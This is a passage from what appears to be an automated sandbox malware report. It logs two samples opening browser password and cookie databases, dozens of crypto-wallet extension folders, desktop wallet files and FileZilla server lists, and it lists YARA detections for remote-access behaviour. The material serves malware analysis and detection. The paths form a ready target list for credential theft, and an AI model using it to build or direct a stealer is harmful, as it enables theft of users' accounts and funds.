Source: C:\Users\user\AppData\Local\Temp\A0B.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cert9.db
Source: C:\Users\user\AppData\Local\c6ede164-9d46-4090-a93b-69cacd3fb0cf\build2.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Users\user\AppData\Local\Temp\A0B.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchh
Source: C:\Users\user\AppData\Local\Temp\A0B.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihoh
Source: C:\Users\user\AppData\Local\Temp\A0B.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic
Source: C:\Users\user\AppData\Local\Temp\A0B.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec
Source: C:\Users\user\AppData\Local\Temp\A0B.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpo
Source: C:\Users\user\AppData\Local\Temp\A0B.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddfffla
Source: C:\Users\user\AppData\Local\c6ede164-9d46-4090-a93b-69cacd3fb0cf\build2.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
Source: C:\Users\user\AppData\Local\Temp\A0B.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn
Source: C:\Users\user\AppData\Local\Temp\A0B.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp
Source: C:\Users\user\AppData\Local\Temp\A0B.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa
Source: C:\Users\user\AppData\Local\Temp\A0B.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbch
Source: C:\Users\user\AppData\Local\Temp\A0B.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi
Source: C:\Users\user\AppData\Local\Temp\A0B.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj
Source: C:\Users\user\AppData\Local\c6ede164-9d46-4090-a93b-69cacd3fb0cf\build2.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cookies.sqlite-wal
Source: C:\Users\user\AppData\Local\Temp\A0B.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp
Source: C:\Users\user\AppData\Local\Temp\A0B.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn
Source: C:\Users\user\AppData\Local\Temp\A0B.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd
Source: C:\Users\user\AppData\Local\Temp\A0B.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad
Source: C:\Users\user\AppData\Local\Temp\A0B.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclg
Source: C:\Users\user\AppData\Local\Temp\A0B.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\CURRENT
Source: C:\Users\user\AppData\Local\Temp\A0B.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm
Source: C:\Users\user\AppData\Local\Temp\A0B.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdaf
Source: C:\Users\user\AppData\Local\Temp\A0B.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac
Source: C:\Users\user\AppData\Local\c6ede164-9d46-4090-a93b-69cacd3fb0cf\build2.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
Source: C:\Users\user\AppData\Local\Temp\A0B.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbch
Source: C:\Users\user\AppData\Local\Temp\A0B.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbg
Source: C:\Users\user\AppData\Local\Temp\A0B.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles
Source: C:\Users\user\AppData\Local\Temp\A0B.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifb
Source: C:\Users\user\AppData\Local\Temp\A0B.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk
Source: C:\Users\user\AppData\Local\Temp\A0B.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn
Source: C:\Users\user\AppData\Local\c6ede164-9d46-4090-a93b-69cacd3fb0cf\build2.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\places.sqlite-shm
Source: C:\Users\user\AppData\Local\Temp\A0B.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm
Source: C:\Users\user\AppData\Local\Temp\A0B.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao
Source: C:\Users\user\AppData\Local\c6ede164-9d46-4090-a93b-69cacd3fb0cf\build2.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Users\user\AppData\Local\Temp\A0B.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfdd
Source: C:\Users\user\AppData\Local\Temp\A0B.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkd
Source: C:\Users\user\AppData\Local\Temp\A0B.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdno
Source: C:\Users\user\AppData\Local\Temp\A0B.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap
Source: C:\Users\user\AppData\Local\Temp\A0B.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjh
Source: C:\Users\user\AppData\Local\Temp\A0B.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai
Source: C:\Users\user\AppData\Local\Temp\A0B.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc
Source: C:\Users\user\AppData\Local\Temp\A0B.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcje
Source: C:\Users\user\AppData\Local\Temp\A0B.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\LOG
Source: C:\Users\user\AppData\Local\c6ede164-9d46-4090-a93b-69cacd3fb0cf\build2.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Users\user\AppData\Local\Temp\A0B.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf
Source: C:\Users\user\AppData\Local\Temp\A0B.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj
Source: C:\Users\user\AppData\Local\Temp\A0B.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg
Source: C:\Users\user\AppData\Local\Temp\A0B.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci
Source: C:\Users\user\AppData\Local\Temp\A0B.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm
Source: C:\Users\user\AppData\Local\Temp\A0B.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln
Source: C:\Users\user\AppData\Local\Temp\A0B.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae
Source: C:\Users\user\AppData\Local\Temp\A0B.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh
Source: C:\Users\user\AppData\Local\c6ede164-9d46-4090-a93b-69cacd3fb0cf\build2.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cookies.sqlite
Source: C:\Users\user\AppData\Local\Temp\A0B.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo
Source: C:\Users\user\AppData\Local\Temp\A0B.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb
Source: C:\Users\user\AppData\Local\Temp\A0B.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkld
Source: C:\Users\user\AppData\Local\Temp\A0B.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm
Source: C:\Users\user\AppData\Local\Temp\A0B.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\formhistory.sqlite
Source: C:\Users\user\AppData\Local\Temp\A0B.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk
Source: C:\Users\user\AppData\Local\c6ede164-9d46-4090-a93b-69cacd3fb0cf\build2.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
Source: C:\Users\user\AppData\Local\c6ede164-9d46-4090-a93b-69cacd3fb0cf\build2.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\places.sqlite-wal
Source: C:\Users\user\AppData\Local\Temp\A0B.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\0absryc3.default\key4.db
Source: C:\Users\user\AppData\Local\Temp\A0B.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph
Source: C:\Users\user\AppData\Local\Temp\A0B.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno
Source: C:\Users\user\AppData\Local\Temp\A0B.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\000003.log
Source: C:\Users\user\AppData\Local\Temp\A0B.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec
Source: C:\Users\user\AppData\Local\Temp\A0B.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account
Source: C:\Users\user\AppData\Local\Temp\A0B.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne
Source: C:\Users\user\AppData\Local\c6ede164-9d46-4090-a93b-69cacd3fb0cf\build2.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cookies.sqlite-shm
Source: C:\Users\user\AppData\Local\Temp\A0B.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk
Source: C:\Users\user\AppData\Local\Temp\A0B.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma
Source: C:\Users\user\AppData\Local\Temp\A0B.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account
Source: C:\Users\user\AppData\Local\Temp\A0B.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb
Source: C:\Users\user\AppData\Local\Temp\A0B.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc
Source: C:\Users\user\AppData\Local\Temp\A0B.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncg
Source: C:\Users\user\AppData\Local\c6ede164-9d46-4090-a93b-69cacd3fb0cf\build2.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\places.sqlite
Source: C:\Users\user\AppData\Local\Temp\A0B.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgef
Source: C:\Users\user\AppData\Local\Temp\A0B.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhad
Source: C:\Users\user\AppData\Local\Temp\A0B.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdil
Source: C:\Users\user\AppData\Local\Temp\A0B.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcge
Source: C:\Users\user\AppData\Local\Temp\A0B.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig
Source: C:\Users\user\AppData\Local\Temp\A0B.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmon
Source: C:\Users\user\AppData\Local\Temp\A0B.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid
Source: C:\Users\user\AppData\Local\Temp\A0B.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih
Source: C:\Users\user\AppData\Local\Temp\A0B.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliof
Source: C:\Users\user\AppData\Local\Temp\A0B.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhi
Source: C:\Users\user\AppData\Local\Temp\A0B.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkp
Source: C:\Users\user\AppData\Local\c6ede164-9d46-4090-a93b-69cacd3fb0cf\build2.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\AppData\Local\Temp\A0B.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnba
Source: C:\Users\user\AppData\Local\Temp\A0B.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\MANIFEST-000001
Source: C:\Users\user\AppData\Local\Temp\A0B.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcellj
Source: C:\Users\user\AppData\Local\Temp\A0B.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoa
Source: C:\Users\user\AppData\Local\Temp\A0B.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm
Source: C:\Users\user\AppData\Local\Temp\A0B.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\key4.db
Source: C:\Users\user\AppData\Local\Temp\A0B.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopg
Source: C:\Users\user\AppData\Local\Temp\A0B.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbn
Source: C:\Users\user\AppData\Local\Temp\A0B.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default
Source: C:\Users\user\AppData\Local\Temp\A0B.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbm
Source: C:\Users\user\AppData\Local\Temp\A0B.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\LOG.old
Source: C:\Users\user\AppData\Local\Temp\A0B.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolb
Source: C:\Users\user\AppData\Local\Temp\A0B.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafa
Source: C:\Users\user\AppData\Local\Temp\A0B.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgik
Source: C:\Users\user\AppData\Local\c6ede164-9d46-4090-a93b-69cacd3fb0cf\build2.exe File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml
Source: C:\Users\user\AppData\Local\Temp\A0B.exe File opened: C:\Users\user\AppData\Roaming\Electrum\wallets
Source: C:\Users\user\AppData\Local\Temp\A0B.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
Source: C:\Users\user\AppData\Local\Temp\A0B.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live
Source: C:\Users\user\AppData\Local\Temp\A0B.exe File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb
Source: C:\Users\user\AppData\Local\Temp\A0B.exe File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
Source: C:\Users\user\AppData\Local\Temp\A0B.exe File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
Source: C:\Users\user\AppData\Local\Temp\A0B.exe File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets
Source: C:\Users\user\AppData\Local\Temp\A0B.exe File opened: C:\Users\user\AppData\Roaming\Binance
Source: C:\Users\user\AppData\Local\Temp\A0B.exe File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB
Source: C:\Users\user\AppData\Local\Temp\A0B.exe Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\A0B.exe Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\A0B.exe Directory queried: C:\Users\user\Documents\EOWRVPQCCS
Source: C:\Users\user\AppData\Local\Temp\A0B.exe Directory queried: C:\Users\user\Documents\LSBIHQFDVT
Source: C:\Users\user\AppData\Local\Temp\A0B.exe Directory queried: C:\Users\user\Documents\PIVFAGEAAV
Source: C:\Users\user\AppData\Local\Temp\A0B.exe Directory queried: C:\Users\user\Documents\QCOILOQIKC
Source: C:\Users\user\AppData\Local\Temp\A0B.exe Directory queried: C:\Users\user\Documents\SFPUSAFIOL
Source: C:\Users\user\AppData\Local\Temp\A0B.exe Directory queried: C:\Users\user\Documents\SQRKHNBNYN
Source: C:\Users\user\AppData\Local\Temp\A0B.exe Directory queried: C:\Users\user\Documents\UOOJJOZIRH
Source: C:\Users\user\AppData\Local\Temp\A0B.exe Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\A0B.exe Directory queried: C:\Users\user\Documents\PIVFAGEAAV
Source: C:\Users\user\AppData\Local\Temp\A0B.exe Directory queried: C:\Users\user\Documents\QCOILOQIKC
Source: C:\Users\user\AppData\Local\Temp\A0B.exe Directory queried: C:\Users\user\Documents\SFPUSAFIOL
Source: C:\Users\user\AppData\Local\Temp\A0B.exe Directory queried: C:\Users\user\Documents\SQRKHNBNYN
Source: C:\Users\user\AppData\Local\Temp\A0B.exe Directory queried: C:\Users\user\Documents\UOOJJOZIRH
Source: C:\Users\user\AppData\Local\Temp\A0B.exe Directory queried: C:\Users\user\Documents\ZQIXMVQGAH
Source: C:\Users\user\AppData\Local\Temp\A0B.exe Directory queried: C:\Users\user\Documents\EOWRVPQCCS
Source: C:\Users\user\AppData\Local\Temp\A0B.exe Directory queried: C:\Users\user\Documents\LSBIHQFDVT
Source: C:\Users\user\AppData\Local\Temp\A0B.exe Directory queried: C:\Users\user\Documents\MXPXCVPDVN
Source: C:\Users\user\AppData\Local\Temp\A0B.exe Directory queried: C:\Users\user\Documents\PIVFAGEAAV
Source: C:\Users\user\AppData\Local\Temp\A0B.exe Directory queried: C:\Users\user\Documents\SQSJKEBWDT
Source: C:\Users\user\AppData\Local\Temp\A0B.exe Directory queried: C:\Users\user\Documents\UOOJJOZIRH
Source: C:\Users\user\AppData\Local\Temp\A0B.exe Directory queried: C:\Users\user\Documents\SFPUSAFIOL
Source: C:\Users\user\AppData\Local\Temp\A0B.exe Directory queried: C:\Users\user\Documents\SQSJKEBWDT
Source: C:\Users\user\AppData\Local\Temp\A0B.exe Directory queried: C:\Users\user\Documents\ZQIXMVQGAH
Source: C:\Users\user\AppData\Local\Temp\A0B.exe Directory queried: C:\Users\user\Documents\GIGIYTFFYT
Source: C:\Users\user\AppData\Local\Temp\A0B.exe Directory queried: C:\Users\user\Documents\QCOILOQIKC
Source: C:\Users\user\AppData\Local\Temp\A0B.exe Directory queried: C:\Users\user\Documents\SFPUSAFIOL
Source: C:\Users\user\AppData\Local\Temp\A0B.exe Directory queried: C:\Users\user\Documents\ZQIXMVQGAH
Source: C:\Users\user\AppData\Local\Temp\A0B.exe Directory queried: C:\Users\user\Documents\ZQIXMVQGAH
Source: C:\Users\user\AppData\Local\Temp\A0B.exe Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\A0B.exe Directory queried: C:\Users\user\Documents\BJZFPPWAPT
Source: C:\Users\user\AppData\Local\Temp\A0B.exe Directory queried: C:\Users\user\Documents\EOWRVPQCCS
Source: C:\Users\user\AppData\Local\Temp\A0B.exe Directory queried: C:\Users\user\Documents\GIGIYTFFYT
Source: C:\Users\user\AppData\Local\Temp\A0B.exe Directory queried: C:\Users\user\Documents\LSBIHQFDVT
Source: C:\Users\user\AppData\Local\Temp\A0B.exe Directory queried: C:\Users\user\Documents\MXPXCVPDVN
Source: C:\Users\user\AppData\Local\Temp\A0B.exe Directory queried: C:\Users\user\Documents\PIVFAGEAAV
Source: C:\Users\user\AppData\Local\Temp\A0B.exe Directory queried: C:\Users\user\Documents\QCOILOQIKC
Source: C:\Users\user\AppData\Local\Temp\A0B.exe Directory queried: C:\Users\user\Documents\SFPUSAFIOL
Source: C:\Users\user\AppData\Local\Temp\A0B.exe Directory queried: C:\Users\user\Documents\SQRKHNBNYN
Source: C:\Users\user\AppData\Local\Temp\A0B.exe Directory queried: C:\Users\user\Documents\SQSJKEBWDT
Source: C:\Users\user\AppData\Local\Temp\A0B.exe Directory queried: C:\Users\user\Documents\UOOJJOZIRH
Source: C:\Users\user\AppData\Local\Temp\A0B.exe Directory queried: C:\Users\user\Documents\ZQIXMVQGAH
Source: C:\Users\user\AppData\Local\Temp\A0B.exe Directory queried: C:\Users\user\Documents\EOWRVPQCCS
Source: C:\Users\user\AppData\Local\Temp\A0B.exe Directory queried: C:\Users\user\Documents\QCOILOQIKC
Source: C:\Users\user\AppData\Local\Temp\A0B.exe Directory queried: C:\Users\user\Documents\SFPUSAFIOL
Source: C:\Users\user\AppData\Local\Temp\A0B.exe Directory queried: C:\Users\user\Documents\UOOJJOZIRH
Source: C:\Users\user\AppData\Local\Temp\A0B.exe Directory queried: C:\Users\user\Documents\ZQIXMVQGAH
Source: Yara match File source: 00000017.00000003.3114615460.000000000148E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000017.00000003.3115169288.000000000148E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000017.00000003.3115958213.0000000001490000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: A0B.exe PID: 5352, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: build2.exe PID: 728, type: MEMORYSTR

Remote Access Functionality

barindex
Source: Yara match File source: 44.3.71C9.exe.39e0000.7.unpack, type: UNPACKEDPE
Source: Yara match File source: 29.2.71C9.exe.3190e67.9.unpack, type: UNPACKEDPE
Source: Yara match File source: 44.2.71C9.exe.400000.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 44.2.71C9.exe.30f0e67.9.unpack, type: UNPACKEDPE
Source: Yara match File source: 29.3.71C9.exe.3a80000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 29.2.71C9.exe.400000.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000002C.00000002.4539281116.0000000003533000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000002C.00000003.3174084489.0000000003E22000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001D.00000002.3174783125.0000000000843000.00000040.00000001.01000000.0000000B.sdmp, type: MEMORY
Source: Yara match File source: 0000001D.00000002.3185463938.00000000035D3000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001D.00000003.3083456233.0000000003EC2000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000002C.00000002.4516603892.0000000000843000.00000040.00000001.01000000.0000000B.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: 71C9.exe PID: 6944, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: 71C9.exe PID: 3208, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: A0B.exe PID: 5352, type: MEMORYSTR
Source: Yara match File source: sslproxydump.pcap, type: PCAP
Source: Yara match File source: 00000006.00000002.2358331788.0000000000C80000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.2358489940.0000000002741000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.2120318342.0000000000CC1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.2120238789.0000000000C80000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: sslproxydump.pcap, type: PCAP
Source: Yara match File source: 35.2.build2.exe.21d15a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 41.2.build2.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 41.2.build2.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 35.2.build2.exe.21d15a0.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000029.00000002.3568020251.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000029.00000002.3569722785.0000000000965000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000002.3157289895.00000000021D0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: build2.exe PID: 5968, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: build2.exe PID: 728, type: MEMORYSTR
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs